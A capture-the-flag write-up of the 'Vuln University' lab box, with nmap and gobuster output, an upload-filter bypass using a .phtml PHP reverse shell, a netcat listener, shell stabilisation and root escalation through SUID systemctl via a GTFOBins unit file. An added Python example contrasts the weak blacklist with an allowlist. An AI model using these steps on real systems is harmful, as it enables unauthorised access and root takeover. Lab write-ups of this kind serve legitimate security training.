Sep 15, 2020


nmap -sC -sV $IP

Starting Nmap 7.80 ( ) at 2020-09-15 20:30 EDT
Nmap scan report for
Host is up (0.17s latency).
Not shown: 994 closed ports
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -7h39m58s, deviation: 2h18m34s, median: -8h59m59s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2020-09-15T11:30:49-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-15T15:30:50
|_ start_date: N/A
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 45.13 seconds


gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2020/09/15 20:40:18 Starting gobuster
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/internal (Status: 301)

/internal is a page where we can upload an image, and through /images we can view it.


We cannot upload a PHP reverse shell directly because the .php extension is not allowed, so we build a wordlist of alternative PHP extensions to find out which ones the blacklist lets through.


.phtml is the only one of these extensions that is accepted, so we rename our reverse shell to use that extension, upload it, and start a netcat listener in our terminal
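The upload filter above fails because it blacklists a few PHP extensions and forgets .phtml. The following is an added example (not the Vuln University code or anything from the room) that models that weak blacklist beside a hardened allowlist, audits which PHP-handled extensions each still accepts, and stores accepted uploads under a server-chosen name; the extension sets are constructed for the example.

```python
import os
import secrets

# Extensions commonly handed to the PHP interpreter on Apache installs.
# Constructed for this example; the real set depends on the server config.
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phar", ".phtml", ".phps"}

# Blacklist modelled on the behaviour seen above: .php is refused, .phtml is not.
BLACKLIST = {".php", ".php3", ".php4", ".php5"}

# What the image upload form actually intends to accept.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}


def blacklist_allows(filename: str) -> bool:
    """Weak check: accept anything whose extension is not explicitly banned.
    Compared case-sensitively, so shell.PHP also slips through."""
    _, ext = os.path.splitext(filename)
    return ext not in BLACKLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened check: accept only a known-good extension, matched
    case-insensitively, on a name carrying exactly one extension."""
    stem, ext = os.path.splitext(os.path.basename(filename))
    if not stem or "." in stem:          # refuses shell.php.jpg style names
        return False
    return ext.lower() in ALLOWLIST


def blacklist_gaps(check, extensions=PHP_EXTENSIONS):
    """Audit helper: which PHP-handled extensions does `check` still accept?"""
    return sorted(e for e in extensions if check("upload" + e))


def stored_name(filename: str) -> str:
    """Server-chosen name for an accepted upload: random stem plus the
    validated extension, so the client never controls the name under /images."""
    if not allowlist_allows(filename):
        raise ValueError("extension not allowed")
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    print("blacklist still accepts:", blacklist_gaps(blacklist_allows))
    print("allowlist still accepts:", blacklist_gaps(allowlist_allows))
    print("stored as:", stored_name("campus.JPG"))
```

Serving the upload directory with PHP execution disabled is the second half of the fix; the name and extension checks alone only narrow what can be dropped there.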

nc -lvp 5555

Then open the uploaded file on the web server to trigger the reverse shell.

Stabilize Shell

First spawn a proper bash with python -c 'import pty; pty.spawn("/bin/bash")', then:

  1. ctrl+z
  2. stty raw -echo
  3. type fg and press enter x2.

You will get a stabilized shell with tab completion; then run export TERM=xterm so the clear command works.

Privilege Escalation

Now we look for binaries with the SUID bit set, which run with the privileges of their owner (root for most of them), so we issue a command to list these files

find / -perm /4000

And we will find systemctl, which has the SUID bit set

Now look up systemctl on GTFOBins and slightly modify its command to run chmod +s /bin/bash, which sets the SUID bit on bash so it runs as root

TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Now run bash -p and you will be root.